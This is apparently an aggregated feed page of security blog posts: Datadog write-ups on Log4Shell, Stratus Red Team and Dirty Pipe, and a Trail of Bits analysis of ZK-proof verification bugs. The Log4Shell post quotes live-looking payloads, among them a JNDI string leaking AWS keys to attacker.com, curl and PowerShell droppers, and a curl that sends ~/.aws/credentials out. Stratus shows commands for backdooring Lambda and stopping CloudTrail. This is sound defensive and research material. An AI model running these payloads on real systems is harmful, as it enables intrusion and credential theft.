# feeds

by zer0x0ne — on

## some of my favourite websites: the hackers news trail of bits dark reading threatpost tripwire security weekly xkcd

### xkcd

Retrieved title: xkcd.com, 3 item(s)

##### Paper Title

Retrieved title: Datadog Security Labs, 3 item(s)
##### The Log4j Log4Shell vulnerability: Overview, detection, and remediation

On December 9, 2021, a critical vulnerability in the popular Log4j Java logging library was disclosed and nicknamed Log4Shell. The vulnerability is tracked as CVE-2021-44228 and is a remote code execution vulnerability that can give an attacker full control of any impacted system.

In this blog post, we will:

We will also look at how to leverage Datadog to protect your infrastructure and applications. Finally, we will provide some intelligence about exploitation attempts in the wild, showcasing how attackers are using this vulnerability.

Note: An official statement detailing how Datadog responded internally to this vulnerability is available here.

## Key points and observations

The information in this section covers what we know as of December 14, 2021.

Log4Shell (CVE-2021-44228) is a vulnerability in Log4j, a widely used open source logging library for Java. The vulnerability was introduced to the Log4j codebase in 2013 as part of the implementation of LOG4J2-313. According to Cisco Talos and Cloudflare, exploitation of the vulnerability as a zero-day in the wild was first recorded on December 1, 2021, nine days before public disclosure.

Below is a timeline of the discovery of Log4Shell and its effects:

• November 26: MITRE assigns the CVE identifier CVE-2021-44228
• November 29: An issue, LOG4J2-3198, is created to fix the vulnerability
• November 30: The commit fixing the vulnerability is pushed to the Log4j codebase
• December 10: LunaSec publishes an analysis and detailed advisory of the vulnerability
• December 10: Mass scanning and exploitation attempts of the vulnerability are recorded (see: Greynoise analysis)

Next, we'll look at how to check if your services are vulnerable to Log4Shell and cover methods to secure them.

## Check if your application is vulnerable

Log4j versions 2.0-beta9 to 2.14.1 (inclusive) are vulnerable. Usage of specific JDK versions (6u211+, 7u201+, 8u191+, and 11.0.1+) makes exploitation more challenging, but remains vulnerable. It's vital first to identify whether you are running these versions of Log4j.

LunaSec released an open-source scanner that you can run against a Java project directory to determine if an application is vulnerable. You can also use open-source software composition analysis (SCA) tooling, such as OWASP DependencyCheck, to identify vulnerable Log4j versions running in your environment.

You can also leverage native Java build tools (e.g., gradle dependencies) to query your application's dependencies, even if they are transitive (i.e., if your application doesn't directly package it, and it is included through a dependency). Below shows a transitive dependency to a vulnerable Log4j version (2.14.1).

./gradlew dependenciesruntimeClasspath - Runtime classpath of source set 'main'.[...]\--- org.springframework.boot:spring-boot-starter-log4j2:2.6.1    +--- org.apache.logging.log4j:log4j-slf4j-impl:2.14.1    |   +--- org.slf4j:slf4j-api:1.7.25 -> 1.7.32    |   +--- org.apache.logging.log4j:log4j-api:2.14.1    |   \--- org.apache.logging.log4j:log4j-core:2.14.1    |      \--- org.apache.logging.log4j:log4j-api:2.14.1

If you do identify applications that are using vulnerable versions of Log4j, there are actions you can take to remediate the problem.

## Remediate affected services

LunaSec's remediation guide is a good resource that details key mitigation strategies. Simply put, the most effective remediation is to upgrade Log4j to version 2.16+. However, if it is not possible to upgrade your Log4j version, you can follow the instructions outlined by LunaSec or the Apache Foundation to remediate the vulnerability.

As a last resort, the community also made available a virtual patching method to prevent exploitation at runtime.

Now that we've gone over how to identify and remediate vulnerable applications, we'll cover the exploit attack chain in more detail and look at other ways you can secure your systems against it.

## How the Log4Shell vulnerability works

The Log4Shell vulnerability targets the parts of Log4j that parse and log user-controlled data. Teams monitoring their infrastructure and business operations routinely log client data, including HTTP requests or IP addresses. Log4Shell allows attackers to abuse this operation to compromise vulnerable applications.

Log4Shell specifically takes advantage of Log4j's ability to use JNDI, the Java Naming and Directory Interface. This feature was added sometime in 2013. By using a specially crafted string that uses JNDI lookups, an attacker can force the vulnerable application to connect to an attacker-controlled LDAP server and issue a malicious payload.

Below is a diagram of the attack chain from the Swiss Government Computer Emergency Response Team (GovCERT).

• Step one: An attacker triggers the exploit, passing a malicious payload via a user-supplied input. This could be an HTTP header or anything being logged by the application using Log4j.
• Step two: The application logs the user-supplied input.
• Step three: The Log4j library interprets the malicious payload and connects to a malicious LDAP server.
• Step four: The malicious LDAP server sends back a response instructing the application to load a remote class file.
• Step five: The application downloads and executes the remote Java class file.

GovCERT recommends a number of defensive measures to help prevent successful exploitation (including the ones we covered above). At Datadog, we have implemented these measures to ensure our systems are fully secure.

While the exploitation steps above reflect what is needed for full application compromise, it is important to be aware that it's possible to leak sensitive data such as environment variables through steps one through three alone. For instance, let's say an attacker supplies the following input that Log4j logs:

curl http://vulnerable-app:8080 \  -H 'X-Api-Version: ${jndi:ldap://${env:AWS_ACCESS_KEY_ID}.${env:AWS_SECRET_ACCESS_KEY}.attacker.com' This will cause the vulnerable application to perform a DNS request to an attacker-controlled server, leaking the application's AWS credentials without the need for a second-stage payload: Next, we'll look at how Datadog can help you detect these exploit steps within your environment. ## How Datadog can help The Datadog Security Platform allows you to detect attacker behavior at different stages of the Log4Shell attack lifecycle. Datadog Application Security (currently in private beta) identifies Log4Shell attack payloads sent to applications. Thanks to its tight integration with Datadog APM, it also provides visibility into vulnerable applications that attempt to remotely load malicious code. You can search in Datadog for occurences of fetched Java classes using the query @http.url:*.class. You can dive into the resulting traces to see details about the request. If you discover your system has been targeted, you should then try to identify possible LDAP connections to the internet. You can use Datadog Network Performance Monitoring to look for suspicious egress connections. The screenshot below shows a vulnerable application connecting to an attacker-controlled LDAP server on port 389, an indicator that the application has likely been compromised. In addition to knowing when an attacker might be attempting to use the Log4Shell exploit on your applications, it's also key to detect if they have been successful and have gained access to your system. Datadog Cloud Workload Security monitors process, file, and kernel activity across your Linux hosts and containers and automatically identifies the common post-exploitation activity that we have seen attackers using after successfully exploiting Log4Shell. Out-of-the-box rules scan for: • Java processes spawning a shell or system utility. This is often an indicator of an application vulnerability having been exploited to execute system commands. • Persistence through systemd. Malware frequently attempts to create system services to persist (i.e., survive system reboots). Although pointless in a container environment, this behavior is indicative of attacker activity. • Persistence through crontabs. Especially in container environments, usage of crontabs is highly suspicious. • Execution of network utility, such as curl or wget. Although this might also be legitimate behavior for debugging purposes, it is generally suspicious to have network utilities running in a container. Ideally, production container images should be stripped down of such utilities. The use of a network utility inside a container can be a valuable indicator of attacker activity. • Usage of package management commands inside containers. Containers are immutable. When they need a new software package, they are torn down and rebuilt from scratch. Consequently, usage of apt, yum, or apk commands is highly suspicious and indicative of an attacker attempting to install utility software. Datadog's out-of-the-box threat detection rules automatically look for the above activity. If any potentially malicious behavior is found, Datadog emits a security signal that you can analyze and determine if your environment is vulnerable. Finally, we'll look at real-world attempts to exploit the Log4Shell vulnerability Datadog has observed in our telemetry. This is critical to understanding how the exploits for Log4Shell have evolved, and allows defenders to monitor for these evolutions. ## Log4Shell in the wild Datadog has observed various Log4Shell exploitation attempts in the wild. While some include probes from security researchers and companies, a substantial portion of them are from threat actors attempting to compromise applications. Other threat intelligence companies have also recorded attacks stemming from financially motivated actors and nation-state actors. In particular, we have observed: • Droppers for commodity malware such as Kinsing and Mirai. Most of these follow a common pattern: curl <ip> -o <short-name> && chmod +x <short-name> && ./<short-name> • A Powershell dropper using a BITS job to download and execute a malicious executable file: powershell -c iex ((New-Object System.Net.WebClient).DownloadString('https://textbin[.]net/raw/0l8h4xuvxe')) • Attempts to exfiltrate the following sensitive environment variables over DNS: AWS_SECRET_ACCESS_KEY, DB_HOST, DB_USERNAME, DB_PASSWORD • Attempts to steal AWS credentials from the file ~/.aws/credentials using the command: curl -d "$(cat ~/.aws/credentials)" https://<redacted>.interactsh.com
• Payload obfuscation to attempt to bypass WAF rules, such as:
${jn${lower:d}i:l${lower:d}ap://<redacted>} • Injections being performed using various HTTP headers, the most common ones being: User-Agent, Referer, X-Forwarded-For, and Authorization. The Kinsing payload Datadog analyzed behaves as follows after having compromised the system: • Checks if curl or wget are installed on the system, and, if not, installs them with apt. • Using curl or wget, downloads a malicious binary to a temporary folder. The target directory is whichever is the first writable of: /tmp, /var/tmp, the resulting directory of mktemp -d, or /dev/shm. • Attempts to clean the system from any competitor malware by removing crontab entries and killing running processes. • Persists on the system by writing a crontab entry executing a malicious script every minute and creating a systemd service. • Runs cryptocurrency mining on the system. Most of these actions are suspicious, especially in a modern cloud-native environment where containers are supposed to be immutable. ## Conclusion The Log4Shell vulnerability is a high-impact vulnerability that is easy for attackers to exploit and has far-reaching consequences on the industry as a whole. In this post, we discussed some detection and prevention strategies for this particular vulnerability, and showcased behavioral detection capabilities of the Datadog Security Platform against real-world attacks. This vulnerability illustrates the need for a defense-in-depth strategy and an "assume breach" mindset, where security mechanisms are layered together to ensure that the failure of a single layer does not lead to a full compromise. ## Acknowledgments Thank you to Jean-Baptiste Aviat, Nick Davis, Emile Spir, and Eslam Salem, all of who contributed to the making of this post. ##### Elevate AWS threat detection with Stratus Red Team A core challenge for threat detection engineering is reproducing common attacker behavior. Several open source and commercial projects exist for traditional endpoint and on-premise security, but there is a clear need for a cloud-native tool built with cloud providers and infrastructure in mind. To meet this growing demand, we're happy to announce Stratus Red Team, an open source project created to emulate common attack techniques directly in your cloud environment. Stratus Red Team allows you to easily execute offensive techniques against live environments and validate your threat detection logic end-to-end. Stratus Red Team is available for free on GitHub, and you can find its documentation at stratus-red-team.cloud. It's a lightweight, easy-to-install Go binary that comes packaged with a number of AWS-specific attack techniques, such as: • Credential access: Steal EC2 instance credentials • Discovery: Execute discovery commands on an EC2 instance • Defense evasion: Stop a CloudTrail trail • Exfiltration: Exfiltrate data from an S3 bucket by backdooring its bucket policy Stratus Red Team is opinionated about the attack techniques it packages. This ensures that each simulated attack is granular, self-sufficient, and provides fully actionable value. You can find the full list of packaged attack techniques here. Each attack technique is mapped to the MITRE ATT&CK framework and has a documentation page, such as the example below, which is automatically generated from its definition in Go code. The project also manages the full lifecycle of each attack technique, including creating and removing any infrastructure or configuration you need to execute them. This is what we call warming up an attack technique; once an attack technique is warm, it can be detonated (i.e., executed to emulate the intended attacker behavior). Once detonated, it can be cleaned up so that any infrastructure created as part of the warm-up phase is removed. We've created a detailed page about how Stratus Red Team compares to other popular cloud security projects, such as Atomic Red Team, Leonidas, Pacu, Amazon GuardDuty, and CloudGoat. ## Getting started with Stratus Red Team You can see the Getting Started guide for an introduction to Stratus Red Team and its building concepts. As a walkthrough of a sample usage, we'll first authenticate to our AWS account using aws-vault. Stratus Red Team expects you to be authenticated against AWS prior to using it, so you can use any authentication method supported by the Go SDK V2 for AWS (e.g.,$HOME/.aws/config, AWS SSO, hardcoded keys in your environment, etc.)


aws-vault exec sandbox --no-session



Let's have a look at the available AWS techniques for persistence:

We can view additional details about any attack technique by running stratus show <TECHNIQUE ID> or by viewing the documentation. For example, $stratus show aws.persistence.lambda-backdoor-function establishes persistence by backdooring a lambda function to allow its invocation from an external AWS account. The warm up phase creates a Lambda function and the detonation phase modifies the Lambda function resource-base policy to allow lambda:InvokeFunction from an external, fictitious AWS account. Detonating this attack technique with Stratus Red Team is as simple as running:  stratus detonate aws.persistence.lambda-backdoor-function  The detonate command will: 1. Warm up the attack technique by creating any prerequisites for it being able to run. For this specific technique, it will create a Lambda function. 2. Detonate the attack technique by calling lambda:AddPermission to backdoor the Lambda execution policy and allow it to be executed by an external AWS account. You should see the following output from these two steps:  Checking your authentication against the AWS API Warming up aws.persistence.backdoor-lambda-function Initializing Terraform to spin up technique prerequisites Applying Terraform to spin up technique prerequisites Lambda function arn:aws:lambda:us-east-1:751353041310:function:stratus-sample-lambda-function is ready Backdooring the resource-based policy of the Lambda function stratus-sample-lambda-function {"Sid":"backdoor","Effect":"Allow","Principal":"*","Action":"lambda:InvokeFunction","Resource":"arn:aws:lambda:us-east-1:751353041310:function:stratus-sample-lambda-function"}  Once detonated, we can check our Lambda function execution policy in the AWS Console and confirm it has been backdoored: To remove any infrastructure created for this attack technique, we simply run:  stratus cleanup aws.persistence.backdoor-lambda-function  At any point in time, we can see the status of our attack techniques by running stratus status. ## Defining attack techniques as code All attack techniques packaged in Stratus Red Team are defined as Go code and can automatically generate user-friendly documentation. Here is what the attack technique Stop CloudTrail Trail looks like, which emulates an attacker attempting to disrupt CloudTrail logging for defense evasion purposes. stratus.GetRegistry().RegisterAttackTechnique(&stratus.AttackTechnique{ ID: "aws.defense-evasion.stop-cloudtrail", FriendlyName: "Stop CloudTrail Trail", Platform: stratus.AWS, MitreAttackTactics: []mitreattack.Tactic{mitreattack.DefenseEvasion}, Description: Stops a CloudTrail Trail from logging. Simulates an attacker disrupting CloudTrail logging.Warm-up: - Create a CloudTrail Trail.Detonation: - Call cloudtrail:StopLogging to stop CloudTrail logging., PrerequisitesTerraformCode: tf, IsIdempotent: true, // cloudtrail:StopLogging is idempotent Detonate: detonate, Revert: revert,}) You'll notice the attack techniques have prerequisite infrastructure. In this case, it requires a CloudTrail trail in order to stop it. Stratus Red Team packages the Terraform code needed to create and remove all prerequisites. The detonation function is the core part of the attack technique, simulating the actual malicious behavior. It is written using the AWS SDK for Go V2 in an imperative manner: func detonate(params map[string]string) error { cloudtrailClient := cloudtrail.NewFromConfig(providers.AWS().GetConnection()) // Retrieve the pre-requisite CloudTrail Trail name trailName := params["cloudtrail_trail_name"] log.Println("Stopping CloudTrail trail " + trailName) _, err := cloudtrailClient.StopLogging(context.Background(), &cloudtrail.StopLoggingInput{ Name: aws.String(trailName), }) if err != nil { return errors.New("unable to stop CloudTrail logging: " + err.Error()) } return nil} ## Using Stratus Red Team as a Go library Although the main entrypoint of Stratus Red Team is its command-line interface, it can also be used programmatically as a Go library. This is valuable to automate the detonation of attack techniques; e.g., in a nightly build as part of a continuous integration system. Read our instructions and examples of programmatic usage for more information. ## What's next? While Stratus Red Team is currently focused on AWS, we plan to add support for Kubernetes and Azure in the future. We will also continue adding new attack techniques and refining the project based on community feedback. ## Acknowledgments The maintainer of Stratus Red Team is Christophe Tafani-Dereeper. We would like to thank the following people for actively improving the project with their early feedback: • Zack Allen, Sam Christian, Andrew Krug, and Adam Stevko from Datadog • Alberto Certo from Nexthink • Nick Frichette from State Farm • Rami McCarthy from Cedar ##### The Dirty Pipe vulnerability: Overview, detection, and remediation On March 7, 2022, Max Kellermann publicly disclosed a vulnerability in the Linux kernel, later named Dirty Pipe, which allows underprivileged processes to write to arbitrary readable files, leading to privilege escalation. This vulnerability affects kernel versions starting from 5.8. After its discovery, it was fixed for all currently maintained releases of Linux in versions 5.16.11, 5.15.25, and 5.10.102. While easier to exploit, it is similar to an older vulnerability disclosed in 2016, Dirty COW, which has been actively exploited by malicious actors since then. While easier to exploit, it is similar to an older vulnerability disclosed in 2016, Dirty COW, which has been actively exploited by malicious actors since then. ## Key Points and observations • May 20, 2020: The vulnerability is unknowingly introduced into the Linux kernel through a code refactoring in commit f6dd975583bd. • August 2, 2020: Linux kernel version 5.8 is released. It is the first version to include the vulnerability. • February 20, 2022: Max Kellermann responsibly discloses the vulnerability to the Linux kernel security team. • February 21, 2022: The patch is released to the Linux Kernel Mailing List, without information about the vulnerability yet. • February 23, 2022: Linux kernel versions 5.16.11, 5.15.25, and 5.10.102 are released with the patch. • March 7, 2022: Public disclosure by Max Kellermann. The Dirty Pipe vulnerability is trivial to exploit and affects a wide range of systems, including some versions of the Android OS, which is based on the Linux kernel. Applying kernel patches is typically more challenging than standard software updates. This can be especially true in the case of Android-based systems. As a consequence, we believe that a high number of systems will remain vulnerable in the future. Datadog was also able to demonstrate that Dirty Pipe can be used to break out from unprivileged containers. Once there has been sufficient time for the community to remediate this vulnerability, we will release full technical details of our container breakout. ## Check if your system is vulnerable This vulnerability exclusively affects Linux-based systems. The easiest way to check whether your system is vulnerable is to see which version of the Linux kernel it uses by running the command uname -r. A system is likely to be vulnerable if it has a kernel version higher than 5.8, but lower than 5.16.11, 5.15.25, or 5.10.102. For instance: • kernel version 5.7.11 is not vulnerable, as it's older than 5.8 • kernel version 5.10.96 is vulnerable, as it's more recent than 5.8 and older than 5.10.102 • kernel version 5.16.10 is vulnerable, as it's more recent than 5.8 and older than 5.16.11 • kernel version 5.16.11 includes a patch and so is not vulnerable For more precise instructions on how to check if a system is vulnerable, you can refer to to the advisory specific to your Linux distribution, which we will cover in the next section. ## Remediate affected systems To remediate the vulnerability, ensure your Linux systems are running a kernel version of 5.16.11, 5.15.25, 5.10.102, or more recent. Major Linux distributions have released dedicated security bulletins to help mitigate the vulnerability, including: While the situation is still developing, as of this writing Azure and GCP have not yet released a bulletin. AWS issued ALAS-2022-1571 and ALAS2KERNEL-5.4-2022-023 for its Amazon Linux operating system. ## How the Dirty Pipe vulnerability works This vulnerability lies in the inner workings of the Linux kernel page cache, which handles what bits of memory ("pages") need to be persisted to disk, and what pages can remain in memory only. When exploited, the Dirty Pipe vulnerability allows an underprivileged user to write arbitrary data to any file that user can read on the file system. There are several ways to exploit this vulnerability for privilege escalation. One of them is by writing to the /etc/passwd file, which contains the list of users along with their privileges. For instance, appending the following line to /etc/passwd creates a new user, "malicious-attacker," with password "datadog" and the same privileges as root: ### Escaping from underprivileged containers using Dirty Pipe The Dirty Pipe vulnerability can also be used to escape from underprivileged Linux containers. We were able to overwrite the RunC binary from a container running a proof of concept exploit. RunC is part of many container runtimes used by Docker and Kubernetes, among other container technologies. Its role is to spawn, run, and configure containers on Linux. A specially crafted attack on RunC allows a malicious actor to compromise the host's operating system, leading to a full host compromise. We will release full details of the PoC in an upcoming blog post, in order to give the community time to update their infrastructure to the latest Linux kernel patches that protect against this attack. ## How Datadog can help The Datadog Cloud Workload Security team is working to add capabilities to the Datadog Agent in order to reliably detect exploitation of Dirty Pipe. Specifically, we have added splice to the list of system calls that the Agent monitors in real time using eBPF. This feature is expected to be released as part of version 7.35 of the Datadog Agent. Customers of Cloud Workload Security will receive a notification to update their Agent to a version that can detect exploitation of the Dirty Pipe vulnerability. By enabling Datadog to watch for splice system calls, we are able to create the following detection rule to identify instances of Dirty Pipe exploitation: tags:audit,dash This rule identifies when the splicesystem call is performed on a file that isn't world-writable, and includes the PIPE_BUF_FLAG_CAN_MERGEflag to trigger the vulnerability. We have also crafted more specific rules to identify several common exploitation cases: • when an executable file is overwritten (splice.pipe_exit_flag & PIPE_BUF_FLAG_CAN_MERGE) > 0) &(splice.file.mode & S_IXGRP > 0 || splice.file.mode & S_IXOTH > 0 || splice.file.mode & S_IXUSR > 0) • when a file in a critical system path is overwritten (splice.pipe_exit_flag & PIPE_BUF_FLAG_CAN_MERGE) > 0&& (splice.file.path in [ ~"/bin/*", ~"/sbin/*", ~"/usr/bin/*", ~"/usr/sbin/*", ~"/usr/local/bin/*", ~"/usr/local/sbin/*", ~"/boot/**" ]) ## Conclusion Dirty Pipe is a significant vulnerability because it provides attackers an easy-to-use local privilege escalation in Linux and cloud infrastructure. We will continue to update this post as more information about the vulnerability becomes available. However, the risks and disruptions Dirty Pipe makes possible can be mitigated through a defense-in-depth security approach. Datadog customers can enable Cloud Workload Security today to get immediate defense at the runtime level by detecting the exploitation in real time. Securing your production environment is a continuous journey, and doesn't stop after you've mitigated this newest vulnerability. For a more holistic, unified security approach, you can check out Datadog's Cloud Security Platform and start a today. ## Acknowledgements Securing your production environment is a continuous journey, and doesn't stop after you've mitigated this newest vulnerability. For a more holistic, unified security approach, you can check out Datadog's Cloud Security Platform and start a 14-day free trial today. ### Trail of Bits Retrieved title: Trail of Bits Blog, 3 item(s) ##### Specialized Zero-Knowledge Proof failures By Opal Wright Zero-knowledge (ZK) proofs are useful cryptographic tools that have seen an explosion of interest in recent years, largely due to their applications to cryptocurrency. The fundamental idea of a ZK proof is that a person with a secret piece of information (a cryptographic key, for instance) can prove something about the secret without revealing the secret itself. Cryptocurrencies are using ZK proofs for all sorts of fun things right now, including anonymity, transaction privacy, and “roll-up” systems that help increase the efficiency of blockchains by using ZK proofs to batch transactions together. ZK proofs are also being used in more general ways, such as allowing security researchers to prove that they know how to exploit a software bug without revealing information about the bug. As with most things in cryptography, though, it’s hard to get everything right. This blog post is all about a pair of bugs in some special-purpose ZKP code that allow ne’er-do-wells to trick some popular software into accepting invalid proofs of impossible statements. That includes “proving” the validity of invalid inputs to a group signature. This, in turn, can lead to invalid signatures. In blockchain systems that use threshold signatures, like ThorChain and Binance, this could allow an attacker to prevent targeted transactions from completing, creating a denial-of-service attack– against the chain as a whole or against specific participants. ## Background on discrete log proofs One specialized ZK proof is a discrete logarithm proof of knowledge. Suppose Bob provides Alice with an RSA modulus N = PQ, where P and Q are very large primes known only to Bob, and Bob wants to prove to Alice that he knows a secret exponent x such that s ≡ tx (mod N). That is, x is the discrete logarithm of s with respect to base t, and he wants to prove that he knows x without revealing anything about it. The protocol works as follows: • First, Bob and Alice agree on a security parameter k, which is a positive integer that determines how many iterations of the protocol to perform. In practice, this is usually set to k = 128. • Second, Bob randomly samples ai from ZΦ(N) for i=1,2,…,k, computes corresponding values αi = tai (mod N), and sends α1,α2,…,αk to Alice. • Third, Alice responds with a sequence of random bits c1,c2,…,ck. • Fourth, Bob computes zi = ai + cix and sends z1,z2,…,zk to Alice. • Finally, Alice checks that tzi ≡ αisci (mod N) for all i = 1,2,…,k. If all the checks pass, she accepts the proof and is confident that Bob really knows x. Otherwise, she rejects the proof—Bob may be cheating! ## Why it works Suppose Bob doesn’t know x. For each i, Bob has two ways to attempt to fool Alice: one if he thinks Alice will pick ci = 0, and one if he thinks Alice will pick ci = 1. If Bob guesses that Alice will select ci = 0, he can select a random ai ∈ ZN and send Alice  αi = tai mod N. If Alice selects ci = 0, Bob sends Alice zi = ai, and Alice sees that tzi ≡ tai ≡ αis0 ≡ αi (mod N) and accepts the i-th iteration of the proof. On the other hand, if Alice selects ci = 1, Bob needs to compute zi such that tzi ≡ tais (mod N). That is, he needs to find the discrete logarithm of tais, which is equal to ai + x. However, Bob doesn’t know x, so he can’t compute a zi that will pass Alice’s check. On the other hand, if Bob guesses that Alice will select ci = 1, he can select a random ai ∈ ZN and send Alice αi = tais−1 (mod N). If Alice selects ci = 1, Bob sends Alice zi = ai. Alice sees that tzi ≡ tai and tai≡ αis ≡ tαis−1s ≡ tai (mod N), and accepts the i-th iteration of the proof. But if Alice selects ci = 0, Bob needs to compute zi such that tzi ≡ tais−1 (mod N), which would be zi = ai − x. But again, since Bob doesn’t know x, he can’t compute a zi that will pass Alice’s check. The trick is, each of Bob’s guesses only has a 50 percent chance of being right. If any one of Bob’s k guesses for Alice’s ci values are wrong, Alice will reject the proof as invalid. If Alice is choosing her ci values randomly, that means Bob’s chances of fooling Alice are about 1 in 2k. Typically, Alice and Bob will use parameters like k = 128. Bob has a better chance of hitting the Powerball jackpot four times in a row than he does of guessing all c1,c2,…,c128 correctly. In the case of a non-interactive proof, as we’ll see in the code below, we don’t rely on Alice to pick the values ci. Instead, Bob and Alice each compute a hash of all the values relevant to the proof:  c = Hash(N ∥ s ∥ t ∥ α1 ∥ … ∥ αk). The bits of c are used as the ci values. This is called the Fiat-Shamir transform. It’s certainly possible to get the Fiat-Shamir transform wrong, with some pretty nasty consequences, but the bugs discussed in this article will not involve Fiat-Shamir failures. ## The code Our proof structure and verification code come from tss-lib, written by the folks at Binance. We came across this code while reviewing other software, and the Binance folks were super responsive when we flagged this issue for them. To start with, we have our Proof structure: type ( Proof struct { Alpha, T [Iterations]*big.Int } ) This is a fairly straightforward structure. We have two arrays of large integers, Alpha and T. These correspond, respectively, to the αi and zi values in the mathematical description above. It’s notable that the Proof structure does not incorporate the modulus N or the values s and t. func (p *Proof) Verify(h1, h2, N *big.Int) bool { if p == nil { return false } modN := common.ModInt(N) msg := append([]*big.Int{h1, h2, N}, p.Alpha[:]...) c := common.SHA512_256i(msg...) cIBI := new(big.Int) for i := 0; i < Iterations; i++ { if p.Alpha[i] == nil || p.T[i] == nil { return false } cI := c.Bit(i) cIBI = cIBI.SetInt64(int64(cI)) h1ExpTi := modN.Exp(h1, p.T[i]) h2ExpCi := modN.Exp(h2, cIBI) alphaIMulH2ExpCi := modN.Mul(p.Alpha[i], h2ExpCi) if h1ExpTi.Cmp(alphaIMulH2ExpCi) != 0 { return false } } return true }  This code actually implements the verification algorithm. The arguments h1 and h2 correspond to t and s, respectively. First, it computes the challenge value c. Then, for each bit ci of c, it computes: If h1ExpTi ≠ alphaIMulH2ExpCi for any 0 < i ≤ k, the proof is rejected. Otherwise, it is accepted. ## The issue The thing to notice is that the Verify function doesn’t do any sort of check to validate h1,  h2, or any of the elements of p.Alpha or p.T. A lack of validity checks means we can trigger all sorts of fun edge cases. In particular, when it comes to logarithms and exponential relationships, it’s important to look out for zero. Recall that, for any x ≠ 0, we have 0x = 0. Additionally, for any x, we have 0 ∙ x = 0. We are going to exploit these facts to force the equality check h1ExpTi = alphaIMulH2ExpCi to always pass. ## The first impossible thing: Base-0 Discrete Logs Suppose Bob creates a Proof structure p with the following values: • All elements of p.T are positive (that is, zi > 0 for all i) • All elements of p.Alpha are set to 0 (that is, αi = 0 for all i) Now consider a call to the Verify function with the following parameters: • N is the product of two large primes • h1 set to any integer (that is, s is unconstrained) • h2 set to 0 (that is, t = 0) The Verify function will check that tzi ≡ αisci (mod N). On the right hand side of the relationship, αi = 0 forces αisci= 0. On the left hand side of the equation, tzi = 0zi = 0 because zi > 0. Thus, the Verify function sees that 0 = 0, and accepts the proof as valid. Recall that the proof is meant to demonstrate that Bob knows the discrete log of s with respect to t. In this case, the Verifier routine will believe that Bob knows an integer x such that s ≡ 0x (mod N) for any s. But if s ∉ {0,1}, that’s impossible! ## The fix Preventing this problem is straightforward: validate that h2 and the elements of p.Alpha are all non-zero. As a matter of practice, it is a good idea to validate all cryptographic values provided by another party, ensuring that, for example, elliptic curve points lie on a curve and that integers fall within their appropriate intervals and satisfy any multiplicative properties. In the case of this proof, such validation would include checking that h1, h2, and p.Alpha are non-zero, relatively prime to N, and fall within the interval [1,N). It would also be a good idea to ensure that N passes some basic checks (such as a bit length check). ## Proof of encryption of a discrete log In some threshold signature protocols, one of the steps in the signature process involves proving two things simultaneously about a secret integer x that Bob knows: • That  X = Rx, where X and R are in an order-q group G (typically, G will be the multiplicative group of integers for some modulus, or an elliptic curve group) • That a ciphertext c = PaillierEncN(x,r) for some randomization value r ∈ Z⋆N and Bob’s public key N. That is,  c = (N + 1)xrN (mod N2). (Just for clarity: G is typically specified alongside a maximal-order group generator g ∈ G. It doesn’t get used directly in the protocol, but it does get integrated into a hash calculation – it doesn’t affect the proof, so don’t worry about it too much.) Proving this consistency between the ciphertext c and the discrete logarithm of X ensures that Bob’s contribution to an elliptic curve signature is the same value he contributed at an earlier point in the protocol. This prevents Bob from contributing bogus X values that lead to invalid signatures. As part of the key generation, a set of “proof parameters” are generated, including a semiprime modulus Ñ (whose factorization is unknown to Alice and Bob), as well as h1 and h2, both coprime to Ñ. Bob begins by selecting uniform random values  α←$Zq3,β←$Z*N,γ←$Zq3Ñ and ρ←$Zq3Ñ. Bob then computes: Finally, Bob computes a Fiat-Shamir challenge value e = Hash(N,Ñ,h1,h2,g,q,R,X,c,u,z,v,w) and the challenge response values: Note that s1 and s2 are computed not modulo any value, but over the integers. Bob then sends Alice the proof πPDL=[z,e,s,s1,s2]. Alice, upon receiving πPDL, first checks that s1 ≤ q3; if this check fails, she rejects the proof as invalid. She then computes: Finally, Alice computes: If e ≠ ê, she rejects <πPDL as invalid. Otherwise, she accepts πPDL as valid. ## Why it works First, let’s make sure that a valid proof will validate: Because u (with a hat), v (with a hat) and w (with a hat), match u, v, and w (respectively), we will have ê, = e, and the proof will validate. To understand how Bob is prevented from cheating, read this paper and section 6 of this paper. ## The code The following code is taken from the kryptology library’s Paillier discrete log proof implementation. Specifically, the following code is used to compute v (with a hat):  func (p PdlProof) vHatConstruct(pv *PdlVerifyParams) (*big.Int, error) { // 5. \hat{v} = s^N . (N + 1)^s_1 . c^-e mod N^2 // s^N . (N + 1)^s_1 mod N^2 pedersenInc, err := inc(p.s1, p.s, pv.Pk.N) if err != nil { return nil, err } cInv, err := crypto.Inv(pv.C, pv.Pk.N2) if err != nil { return nil, err } cInvToE := new(big.Int).Exp(cInv, p.e, pv.Pk.N2) vHat, err := crypto.Mul(pedersenInc, cInvToE, pv.Pk.N2) if err != nil { return nil, err } return vHat, nil }  The calling function, Verify, uses vHatConstruct to compute the v (with a hat) value described above. In a valid proof, everything should work out just fine. ## The issue In an invalid proof, things do not work out just fine. In particular, it is possible for Bob to set  v = s = 0 . When this happens, the value of c is irrelevant: Alice winds up checking that v (with a hat)  = 0N ∙ (N+1)s1 ∙ c−e = 0 = v, and accepts the result. ## The second impossible thing: Arbitrary Ciphertexts By exploiting the v (with a hat) = s = 0 issue, Bob can prove that he knows x such that  X = Rx, but simultaneously “prove” to Alice that any value for c ≠ 0 is a valid ciphertext for x. Bob doesn’t even need to know the factorization of N. Once again, Bob has “proved” the impossible! This forgery has real security implications. In particular, being able to forge this proof allows Bob to sabotage the threshold signature protocol without being detected. In some systems, this could be used to prevent valid transactions from being performed. It is worth noting: the specific case of c = 0 will be detected as an error. The line cInv, err := crypto.Inv(pv.C, pv.Pk.N2) attempts to invert c modulo N2. When c = 0, this function will return an error, causing the vHatConstruct function to return an error in turn. ## The fix Again, this can be prevented by better input validation. Basic validation of the proof would involve checking that z and s are in Z*N. That is, checking that gcd(z,N) = gcd(s,N) = 1, which forces z ≠ 0 and s ≠ 0. Additionally, there should be checks to ensure s1 ≠ 0 and s2 ≠ 0. ## Risks and disclosure ### The risk These bugs were found in repositories that implement the GG20 threshold signature scheme. If attackers exploit the ciphertext malleability bug, they can “prove” the validity of invalid inputs to a group signature, leading to invalid signatures. If a particular blockchain relies on threshold signatures, this could allow an attacker to prevent targeted transactions from completing. ### Disclosure We have reported the issues with tss-lib to Binance, who promptly fixed them. We have also reached out to numerous projects that rely on tss-lib (or, more commonly, forks of tss-lib). This includes ThorChain, who have also fixed the code; Joltify and SwipeChain rely directly on the ThorChain fork. Additionally, Keep Networks maintains their own fork of tss-lib; they have integrated fixes. The issue with kryptology has been reported to Coinbase. The kryptology project on GitHub has since been archived. We were not able to identify any current projects that rely on the library’s 